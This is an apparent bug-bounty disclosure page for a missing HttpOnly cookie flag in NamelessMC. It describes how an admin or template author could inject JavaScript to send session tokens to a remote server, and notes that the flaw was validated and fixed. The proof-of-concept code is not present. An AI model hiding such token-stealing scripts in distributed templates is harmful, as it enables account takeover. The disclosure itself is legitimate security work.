Sensitive Cookie Without 'HttpOnly' Flag in namelessmc/nameless


Reported on

Oct 23rd 2021


Due to a culmination of factors in the design of the authentication and authorization system and a lack of proper cookie setting it is possible for a malicious user to exfiltrate session tokens from a NamelessMC instance and aggregate them in a remote service.

A malicious administrative user can use NamelessMC's built in template system to either maliciously inject arbitrary JS into a single instance, or they can create and distribute a template that administrative users on other instances may install.

This issue stems primarily from the lack of HttpOnly being set on cookies and improper validation of the session to ensure a session cannot be shared with entity.

Proof of Concept

Edit the active template as an administrator, and add the following code to the footer.tpl file.


Now, imagine someone creating a desirable template for the software and making it available for others to download. It would be trivial to hide such code within a template and anyone who installs it on their system would then be sending cookie values over the wire to an attacker controlled server. A user with a popular existing template could also make modifications and submit an update that others would then install.


This vulnerability allows a malicious actor to login as any user of the software once tokens have been exfiltrated.

We have contacted a member of the namelessmc/nameless team and are waiting to hear back 2 years ago
Dane Everitt modified the report
2 years ago
Dane Everitt modified the report
2 years ago
namelessmc/nameless maintainer validated this vulnerability 2 years ago
Dane Everitt has been awarded the disclosure bounty
The fix bounty is now up for grabs
namelessmc/nameless maintainer marked this as fixed with commit a65cc3 2 years ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation